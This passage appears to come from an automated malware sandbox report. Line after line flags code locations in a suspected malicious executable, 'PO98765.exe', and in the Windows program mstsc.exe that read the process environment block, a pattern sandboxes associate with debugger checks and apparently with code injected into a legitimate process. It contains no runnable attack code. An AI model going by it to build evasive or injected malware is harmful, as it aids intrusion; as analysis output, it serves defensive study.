          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01557794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0159AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0150A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01508E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01591608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_01518EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0158FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_014E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_0156FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exeCode function: 1_2_015A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05113D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05134D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05134D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05134D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0518A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05127D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05143D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05183540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05132581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05132581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05132581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05132581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05102D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05131DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05131DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05131DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05186CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05104F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05104F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05118794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05187794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05187794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05187794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05138E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05148EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05109100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05109100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05109100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05124120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05124120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05124120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05124120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05124120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05132990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0512C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05187016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05187016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05187016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0511B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05120050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05120050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05109080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05183884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05183884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05133B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05133B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0510DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0513B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_05132397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_051BD380 mov ecx, dword ptr fs:[00000030h]
